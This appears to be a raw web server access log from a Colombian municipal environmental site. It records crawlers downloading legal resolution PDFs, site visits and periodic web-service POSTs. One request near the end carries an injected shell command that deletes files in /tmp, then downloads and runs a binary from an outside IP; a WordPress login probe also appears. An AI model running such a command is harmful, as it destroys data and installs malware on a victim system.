201.245.192.253 - - [04/Feb/2023:22:38:54 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42951
201.245.192.253 - - [04/Feb/2023:22:39:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [04/Feb/2023:22:40:06 -0500] "HEAD / HTTP/1.1" 200 -
186.29.181.171 - - [04/Feb/2023:22:40:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/4511.pdf HTTP/1.1" 200 344309
186.29.181.171 - - [04/Feb/2023:22:40:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/4510.pdf HTTP/1.1" 200 353658
186.29.181.171 - - [04/Feb/2023:22:40:17 -0500] "GET /BLA/resoluciones/AUTOS%202021/4509.pdf HTTP/1.1" 200 355558
186.29.181.171 - - [04/Feb/2023:22:40:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/4508.pdf HTTP/1.1" 200 347602
186.29.181.171 - - [04/Feb/2023:22:40:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/4507.pdf HTTP/1.1" 200 345394
186.29.181.171 - - [04/Feb/2023:22:40:26 -0500] "GET /BLA/resoluciones/AUTOS%202021/4506.pdf HTTP/1.1" 200 388415
186.29.181.171 - - [04/Feb/2023:22:40:28 -0500] "GET /BLA/resoluciones/AUTOS%202021/4505.pdf HTTP/1.1" 200 401733
186.29.181.171 - - [04/Feb/2023:22:40:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/4504.pdf HTTP/1.1" 200 396434
186.29.181.171 - - [04/Feb/2023:22:40:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/4503.pdf HTTP/1.1" 200 363736
186.29.181.171 - - [04/Feb/2023:22:40:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/4502.pdf HTTP/1.1" 200 363949
186.29.181.171 - - [04/Feb/2023:22:40:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/4501.pdf HTTP/1.1" 200 837704
186.29.181.171 - - [04/Feb/2023:22:40:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/4500.pdf HTTP/1.1" 200 529841
186.29.181.171 - - [04/Feb/2023:22:40:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/4499.pdf HTTP/1.1" 200 1204146
157.55.39.117 - - [04/Feb/2023:22:40:49 -0500] "GET /bla/resoluciones/autos%202021/6747.pdf HTTP/1.1" 200 370714
186.29.181.171 - - [04/Feb/2023:22:40:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/4498.pdf HTTP/1.1" 200 364255
186.29.181.171 - - [04/Feb/2023:22:40:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/4497.pdf HTTP/1.1" 200 445912
186.29.181.171 - - [04/Feb/2023:22:41:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/4496.pdf HTTP/1.1" 200 364416
186.29.181.171 - - [04/Feb/2023:22:41:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/4495.pdf HTTP/1.1" 200 366290
31.148.130.2 - - [04/Feb/2023:22:41:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/6758.pdf HTTP/1.1" 200 376580
186.29.181.171 - - [04/Feb/2023:22:41:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/4494.pdf HTTP/1.1" 200 367234
186.29.181.171 - - [04/Feb/2023:22:41:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/4493.pdf HTTP/1.1" 200 539682
186.29.181.171 - - [04/Feb/2023:22:41:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/4492.pdf HTTP/1.1" 200 566311
186.29.181.171 - - [04/Feb/2023:22:41:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/4491.pdf HTTP/1.1" 200 385488
172.22.2.4 - - [04/Feb/2023:22:40:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [04/Feb/2023:22:41:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
173.252.79.5 - - [04/Feb/2023:22:43:42 -0500] "GET /images/2%20de%20febrero%20liberaci\xc3\xb3n%20Tunjo.jpeg HTTP/1.1" 404 1034
173.252.87.18 - - [04/Feb/2023:22:44:01 -0500] "GET /images/1%20de%20febrero%20D\xc3\xada%20sin%20carro.jpeg HTTP/1.1" 404 1034
201.245.192.253 - - [04/Feb/2023:22:44:14 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
173.252.79.24 - - [04/Feb/2023:22:44:51 -0500] "GET /images/2%20de%20febrero%20liberaci\xc3\xb3n%20Tunjo.jpeg HTTP/1.1" 404 1034
216.245.221.92 - - [04/Feb/2023:22:45:06 -0500] "HEAD / HTTP/1.1" 200 -
173.252.107.1 - - [04/Feb/2023:22:46:34 -0500] "GET /distrito-declara-alerta-ambiental-por-calidad-del-aire-y-apoyara-extincion-de-incendios-en-la-amazonia.html HTTP/1.1" 206 928
186.29.181.171 - - [04/Feb/2023:22:47:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/4490.pdf HTTP/1.1" 200 352998
186.29.181.171 - - [04/Feb/2023:22:47:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/4489.pdf HTTP/1.1" 200 372891
186.29.181.171 - - [04/Feb/2023:22:47:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/4488.pdf HTTP/1.1" 200 351412
186.29.181.171 - - [04/Feb/2023:22:47:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/4487.pdf HTTP/1.1" 200 359289
186.29.181.171 - - [04/Feb/2023:22:47:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/4486.pdf HTTP/1.1" 200 344287
157.55.39.41 - - [04/Feb/2023:22:47:50 -0500] "GET /portaldeninos/parque-ecologico-distrital-humedal-santa-maria-del-lago/ HTTP/1.1" 200 90199
186.29.181.171 - - [04/Feb/2023:22:47:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/4485.pdf HTTP/1.1" 200 352311
186.29.181.171 - - [04/Feb/2023:22:47:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/4484.pdf HTTP/1.1" 200 353286
186.29.181.171 - - [04/Feb/2023:22:47:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/4483.pdf HTTP/1.1" 200 352677
186.29.181.171 - - [04/Feb/2023:22:48:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/4482.pdf HTTP/1.1" 200 388440
172.22.2.4 - - [04/Feb/2023:22:46:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
186.29.181.171 - - [04/Feb/2023:22:48:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/4480.pdf HTTP/1.1" 200 407388
186.29.181.171 - - [04/Feb/2023:22:48:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/4459.pdf HTTP/1.1" 200 353188
186.29.181.171 - - [04/Feb/2023:22:48:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/4458.pdf HTTP/1.1" 200 353547
186.29.181.171 - - [04/Feb/2023:22:48:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/4457.pdf HTTP/1.1" 200 345660
186.29.181.171 - - [04/Feb/2023:22:48:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/4449.pdf HTTP/1.1" 200 377767
186.29.181.171 - - [04/Feb/2023:22:48:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/4448.pdf HTTP/1.1" 200 379543
186.29.181.171 - - [04/Feb/2023:22:48:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/4447.pdf HTTP/1.1" 200 378312
186.29.181.171 - - [04/Feb/2023:22:48:25 -0500] "GET /BLA/resoluciones/AUTOS%202021/4446.pdf HTTP/1.1" 200 377916
186.29.181.171 - - [04/Feb/2023:22:48:28 -0500] "GET /BLA/resoluciones/AUTOS%202021/4445.pdf HTTP/1.1" 200 378388
5.45.207.123 - - [04/Feb/2023:22:48:51 -0500] "-" 408 -
172.22.2.4 - - [04/Feb/2023:22:47:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
201.245.192.253 - - [04/Feb/2023:22:49:13 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [04/Feb/2023:22:50:06 -0500] "HEAD / HTTP/1.1" 200 -
172.58.188.62 - - [04/Feb/2023:22:50:07 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
172.58.188.62 - - [04/Feb/2023:22:50:07 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
172.58.188.62 - - [04/Feb/2023:22:50:07 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
185.119.81.100 - - [04/Feb/2023:22:50:42 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.100 - - [04/Feb/2023:22:50:43 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
40.77.167.251 - - [04/Feb/2023:22:50:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/4507.pdf HTTP/1.1" 200 345394
40.77.167.251 - - [04/Feb/2023:22:50:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/4513.pdf HTTP/1.1" 200 345149
52.167.144.97 - - [04/Feb/2023:22:50:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/4512.pdf HTTP/1.1" 200 361309
157.55.39.117 - - [04/Feb/2023:22:50:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/4508.pdf HTTP/1.1" 200 347602
40.77.167.251 - - [04/Feb/2023:22:51:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/4499.pdf HTTP/1.1" 200 1204146
52.167.144.49 - - [04/Feb/2023:22:51:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/4446.pdf HTTP/1.1" 200 377916
157.55.39.117 - - [04/Feb/2023:22:51:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/4501.pdf HTTP/1.1" 200 837704
40.77.167.251 - - [04/Feb/2023:22:51:03 -0500] "GET /BLA/resoluciones/AUTOS%202021/4520.pdf HTTP/1.1" 200 417947
157.55.39.142 - - [04/Feb/2023:22:51:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/4530.pdf HTTP/1.1" 200 382571
52.167.144.49 - - [04/Feb/2023:22:51:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/4458.pdf HTTP/1.1" 200 353547
52.167.144.97 - - [04/Feb/2023:22:51:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/4505.pdf HTTP/1.1" 200 401733
157.55.39.142 - - [04/Feb/2023:22:51:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/4514.pdf HTTP/1.1" 200 353706
52.167.144.49 - - [04/Feb/2023:22:51:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/4506.pdf HTTP/1.1" 200 388415
183.136.225.32 - - [04/Feb/2023:22:51:16 -0500] "GET / HTTP/1.1" 200 319
40.77.167.234 - - [04/Feb/2023:22:51:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/4529.pdf HTTP/1.1" 200 396721
157.55.39.117 - - [04/Feb/2023:22:51:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/4531.pdf HTTP/1.1" 200 401352
40.77.167.234 - - [04/Feb/2023:22:51:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/4542.pdf HTTP/1.1" 200 341466
157.55.39.142 - - [04/Feb/2023:22:51:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/4457.pdf HTTP/1.1" 200 345660
52.167.144.49 - - [04/Feb/2023:22:51:28 -0500] "GET /BLA/resoluciones/AUTOS%202021/4480.pdf HTTP/1.1" 200 407388
157.55.39.117 - - [04/Feb/2023:22:51:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/4448.pdf HTTP/1.1" 200 379543
52.167.144.97 - - [04/Feb/2023:22:51:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/4494.pdf HTTP/1.1" 200 367234
157.55.39.117 - - [04/Feb/2023:22:51:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/4519.pdf HTTP/1.1" 200 378531
40.77.167.251 - - [04/Feb/2023:22:51:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/4493.pdf HTTP/1.1" 200 539682
31.148.130.53 - - [04/Feb/2023:22:51:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/4962.pdf HTTP/1.1" 200 498336
40.77.167.234 - - [04/Feb/2023:22:51:43 -0500] "GET /BLA/resoluciones/AUTOS%202021/4504.pdf HTTP/1.1" 200 396434
40.77.167.251 - - [04/Feb/2023:22:51:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/4447.pdf HTTP/1.1" 200 378312
52.167.144.49 - - [04/Feb/2023:22:51:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/4521.pdf HTTP/1.1" 200 388895
40.77.167.251 - - [04/Feb/2023:22:51:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/4538.pdf HTTP/1.1" 200 339334
52.167.144.49 - - [04/Feb/2023:22:51:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/4533.pdf HTTP/1.1" 200 420229
157.55.39.117 - - [04/Feb/2023:22:51:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/4488.pdf HTTP/1.1" 200 351412
40.77.167.234 - - [04/Feb/2023:22:51:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/4487.pdf HTTP/1.1" 200 359289
52.167.144.97 - - [04/Feb/2023:22:51:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/4539.pdf HTTP/1.1" 200 335699
157.55.39.142 - - [04/Feb/2023:22:51:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/4489.pdf HTTP/1.1" 200 372891
40.77.167.234 - - [04/Feb/2023:22:52:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/4541.pdf HTTP/1.1" 200 531420
40.77.167.251 - - [04/Feb/2023:22:52:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/4495.pdf HTTP/1.1" 200 366290
157.55.39.142 - - [04/Feb/2023:22:52:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/4522.pdf HTTP/1.1" 200 557898
52.167.144.49 - - [04/Feb/2023:22:52:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/4511.pdf HTTP/1.1" 200 344309
157.55.39.117 - - [04/Feb/2023:22:52:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/4496.pdf HTTP/1.1" 200 364416
52.167.144.49 - - [04/Feb/2023:22:52:10 -0500] "GET /bla/resoluciones/autos%202022/2017.pdf HTTP/1.1" 200 370960
40.77.167.251 - - [04/Feb/2023:22:52:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/4459.pdf HTTP/1.1" 200 353188
40.77.167.234 - - [04/Feb/2023:22:52:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/4532.pdf HTTP/1.1" 200 347903
40.77.167.251 - - [04/Feb/2023:22:52:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/4484.pdf HTTP/1.1" 200 353286
157.55.39.142 - - [04/Feb/2023:22:52:26 -0500] "GET /BLA/resoluciones/AUTOS%202021/4445.pdf HTTP/1.1" 200 378388
40.77.167.234 - - [04/Feb/2023:22:52:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/4502.pdf HTTP/1.1" 200 363949
157.55.39.117 - - [04/Feb/2023:22:52:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/4490.pdf HTTP/1.1" 200 352998
157.55.39.142 - - [04/Feb/2023:22:52:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/4491.pdf HTTP/1.1" 200 385488
186.29.181.171 - - [04/Feb/2023:22:52:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/4444.pdf HTTP/1.1" 200 378760
186.29.181.171 - - [04/Feb/2023:22:52:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/4443.pdf HTTP/1.1" 200 376169
186.29.181.171 - - [04/Feb/2023:22:52:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/4442.pdf HTTP/1.1" 200 377480
186.29.181.171 - - [04/Feb/2023:22:52:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/4441.pdf HTTP/1.1" 200 377819
186.29.181.171 - - [04/Feb/2023:22:52:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/4440.pdf HTTP/1.1" 200 377588
157.55.39.142 - - [04/Feb/2023:22:52:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/4483.pdf HTTP/1.1" 200 352677
186.29.181.171 - - [04/Feb/2023:22:52:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/4439.pdf HTTP/1.1" 200 402293
157.55.39.142 - - [04/Feb/2023:22:52:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/4498.pdf HTTP/1.1" 200 364255
186.29.181.171 - - [04/Feb/2023:22:53:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/4438.pdf HTTP/1.1" 200 403620
186.29.181.171 - - [04/Feb/2023:22:53:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/4436.pdf HTTP/1.1" 200 355601
186.29.181.171 - - [04/Feb/2023:22:53:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/4435.pdf HTTP/1.1" 200 383098
186.29.181.171 - - [04/Feb/2023:22:53:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/4430.pdf HTTP/1.1" 200 367591
186.29.181.171 - - [04/Feb/2023:22:53:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/4424.pdf HTTP/1.1" 200 365572
186.29.181.171 - - [04/Feb/2023:22:53:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/4423.pdf HTTP/1.1" 200 421164
172.22.2.4 - - [04/Feb/2023:22:52:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
186.29.181.171 - - [04/Feb/2023:22:53:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/4421.pdf HTTP/1.1" 200 363964
186.29.181.171 - - [04/Feb/2023:22:53:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/4419.pdf HTTP/1.1" 200 355765
186.29.181.171 - - [04/Feb/2023:22:54:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/4417.pdf HTTP/1.1" 200 364744
186.29.181.171 - - [04/Feb/2023:22:54:03 -0500] "GET /BLA/resoluciones/AUTOS%202021/4410.pdf HTTP/1.1" 200 361322
186.29.181.171 - - [04/Feb/2023:22:54:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/4407.pdf HTTP/1.1" 200 812177
201.245.192.253 - - [04/Feb/2023:22:54:12 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
173.252.87.119 - - [04/Feb/2023:22:54:35 -0500] "GET /images/Acuerdos%2001%20(1)%20(1).jpeg HTTP/1.1" 200 32884
173.252.79.16 - - [04/Feb/2023:22:54:35 -0500] "GET /images/Acuerdos%2001%20(1)%20(1).jpeg HTTP/1.1" 200 32884
172.22.2.4 - - [04/Feb/2023:22:53:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54816
216.245.221.92 - - [04/Feb/2023:22:55:06 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.251 - - [04/Feb/2023:22:56:49 -0500] "GET /bla/resoluciones/autos%202021/5972.pdf HTTP/1.1" 200 402667
193.32.162.159 - - [04/Feb/2023:22:57:11 -0500] "GET / HTTP/1.1" 200 319
183.136.225.32 - - [04/Feb/2023:22:57:12 -0500] "GET / HTTP/1.1" 200 319
183.136.225.32 - - [04/Feb/2023:22:57:12 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
173.252.107.14 - - [04/Feb/2023:22:57:57 -0500] "GET /images/foto%202.jpg HTTP/1.1" 200 63300
87.250.224.100 - - [04/Feb/2023:22:58:51 -0500] "-" 408 -
201.245.192.253 - - [04/Feb/2023:22:59:11 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
40.77.167.251 - - [04/Feb/2023:22:59:17 -0500] "GET /bla/resoluciones/resoluciones%202022/3847.pdf HTTP/1.1" 200 483302
172.22.2.4 - - [04/Feb/2023:22:58:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [04/Feb/2023:23:00:06 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [04/Feb/2023:22:58:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55680
201.245.192.253 - - [04/Feb/2023:23:04:09 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
173.252.87.18 - - [04/Feb/2023:23:04:21 -0500] "GET /images/2%20de%20febrero%20liberaci\xc3\xb3n%20Tunjo.jpeg HTTP/1.1" 404 1034
186.29.181.171 - - [04/Feb/2023:23:04:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/4401.pdf HTTP/1.1" 200 390435
186.29.181.171 - - [04/Feb/2023:23:04:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/4400.pdf HTTP/1.1" 200 389860
186.29.181.171 - - [04/Feb/2023:23:04:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/4393.pdf HTTP/1.1" 200 365499
186.29.181.171 - - [04/Feb/2023:23:04:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/4392.pdf HTTP/1.1" 200 359674
186.29.181.171 - - [04/Feb/2023:23:04:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/4390.pdf HTTP/1.1" 200 358155
186.29.181.171 - - [04/Feb/2023:23:04:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/4389.pdf HTTP/1.1" 200 394467
186.29.181.171 - - [04/Feb/2023:23:05:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/4388.pdf HTTP/1.1" 200 426762
186.29.181.171 - - [04/Feb/2023:23:05:03 -0500] "GET /BLA/resoluciones/AUTOS%202021/4383.pdf HTTP/1.1" 200 361916
186.29.181.171 - - [04/Feb/2023:23:05:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/4382.pdf HTTP/1.1" 200 490174
216.245.221.92 - - [04/Feb/2023:23:05:06 -0500] "HEAD / HTTP/1.1" 200 -
186.29.181.171 - - [04/Feb/2023:23:05:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/4345.pdf HTTP/1.1" 200 391329
186.29.181.171 - - [04/Feb/2023:23:05:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/4344.pdf HTTP/1.1" 200 401278
186.29.181.171 - - [04/Feb/2023:23:05:17 -0500] "GET /BLA/resoluciones/AUTOS%202021/4343.pdf HTTP/1.1" 200 395463
186.29.181.171 - - [04/Feb/2023:23:05:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/4342.pdf HTTP/1.1" 200 382440
186.29.181.171 - - [04/Feb/2023:23:05:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/4341.pdf HTTP/1.1" 200 358737
186.29.181.171 - - [04/Feb/2023:23:05:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/4339.pdf HTTP/1.1" 200 389521
186.29.181.171 - - [04/Feb/2023:23:05:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/4338.pdf HTTP/1.1" 200 678398
186.29.181.171 - - [04/Feb/2023:23:05:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/4337.pdf HTTP/1.1" 200 1038932
40.77.167.234 - - [04/Feb/2023:23:05:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/4407.pdf HTTP/1.1" 200 812177
186.29.181.171 - - [04/Feb/2023:23:05:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/4336.pdf HTTP/1.1" 200 462861
157.55.39.142 - - [04/Feb/2023:23:05:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/4417.pdf HTTP/1.1" 200 364744
186.29.181.171 - - [04/Feb/2023:23:05:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/4334.pdf HTTP/1.1" 200 406089
52.167.144.97 - - [04/Feb/2023:23:05:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/4443.pdf HTTP/1.1" 200 376169
172.22.2.4 - - [04/Feb/2023:23:03:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
157.55.39.117 - - [04/Feb/2023:23:05:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/4419.pdf HTTP/1.1" 200 355765
186.29.181.171 - - [04/Feb/2023:23:05:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/4327.pdf HTTP/1.1" 200 401120
40.77.167.234 - - [04/Feb/2023:23:05:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/4423.pdf HTTP/1.1" 200 421164
40.77.167.251 - - [04/Feb/2023:23:05:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/4441.pdf HTTP/1.1" 200 377819
52.167.144.49 - - [04/Feb/2023:23:05:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/4435.pdf HTTP/1.1" 200 383098
186.29.181.171 - - [04/Feb/2023:23:05:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/4324.pdf HTTP/1.1" 200 780027
157.55.39.117 - - [04/Feb/2023:23:05:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/4438.pdf HTTP/1.1" 200 403620
157.55.39.142 - - [04/Feb/2023:23:05:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/4424.pdf HTTP/1.1" 200 365572
52.167.144.49 - - [04/Feb/2023:23:05:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/4436.pdf HTTP/1.1" 200 355601
40.77.167.251 - - [04/Feb/2023:23:05:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/4442.pdf HTTP/1.1" 200 377480
52.167.144.97 - - [04/Feb/2023:23:05:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/4421.pdf HTTP/1.1" 200 363964
40.77.167.234 - - [04/Feb/2023:23:05:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/4444.pdf HTTP/1.1" 200 378760
52.167.144.49 - - [04/Feb/2023:23:06:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/4439.pdf HTTP/1.1" 200 402293
52.167.144.97 - - [04/Feb/2023:23:06:05 -0500] "GET /bla/resoluciones/resoluciones%202022/4479.pdf HTTP/1.1" 200 1734450
172.22.2.4 - - [04/Feb/2023:23:04:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53337
186.86.33.189 - - [04/Feb/2023:23:06:40 -0500] "-" 408 -
173.252.107.16 - - [04/Feb/2023:23:07:03 -0500] "GET /secretaria-de-ambiente-exalta-a-organizaciones-y-colectivos-en-conmemoracion-del-dia-del-voluntariado-ambiental.html HTTP/1.1" 206 1093
66.220.149.18 - - [04/Feb/2023:23:07:12 -0500] "GET /images/1%20de%20febrero%20D\xc3\xada%20sin%20carro.jpeg HTTP/1.1" 404 1034
186.84.21.61 - - [04/Feb/2023:23:08:06 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
5.255.253.159 - - [04/Feb/2023:23:08:50 -0500] "-" 408 -
69.63.184.119 - - [04/Feb/2023:23:08:58 -0500] "GET /images/Aguanoso2.jpeg HTTP/1.1" 200 128232
69.63.184.117 - - [04/Feb/2023:23:08:59 -0500] "GET /secretaria-de-ambiente-realizo-piloto-antes-de-apertura-oficial-del-camino-de-los-cerros-guadalupe-aguanoso.html HTTP/1.1" 206 982
201.245.192.253 - - [04/Feb/2023:23:09:08 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.79.109 - - [04/Feb/2023:23:09:27 -0500] "-" 408 -
69.171.251.9 - - [04/Feb/2023:23:10:00 -0500] "GET /images/IMG_3028%20(1).jpg HTTP/1.1" 200 435206
216.245.221.92 - - [04/Feb/2023:23:10:06 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [04/Feb/2023:23:09:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
31.148.131.242 - - [04/Feb/2023:23:11:25 -0500] "GET /BLA/resoluciones/AUTOS%202021/6787.pdf HTTP/1.1" 200 373107
172.22.2.4 - - [04/Feb/2023:23:10:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
52.167.144.49 - - [04/Feb/2023:23:12:18 -0500] "GET /bla/resoluciones/autos%202021/6341.pdf HTTP/1.1" 200 748686
201.245.192.253 - - [04/Feb/2023:23:14:07 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [04/Feb/2023:23:15:06 -0500] "HEAD / HTTP/1.1" 200 -
191.111.20.117 - - [04/Feb/2023:23:15:12 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2021%2F HTTP/1.1" 200 438114
191.111.20.117 - - [04/Feb/2023:23:15:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0528.pdf HTTP/1.1" 200 506251
191.111.20.117 - - [04/Feb/2023:23:15:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0527.pdf HTTP/1.1" 200 548254
188.11.196.17 - - [04/Feb/2023:23:16:32 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+45.12.253.180/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
172.22.2.4 - - [04/Feb/2023:23:15:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [04/Feb/2023:23:16:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
87.250.224.184 - - [04/Feb/2023:23:18:50 -0500] "-" 408 -
201.245.192.253 - - [04/Feb/2023:23:18:51 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39441
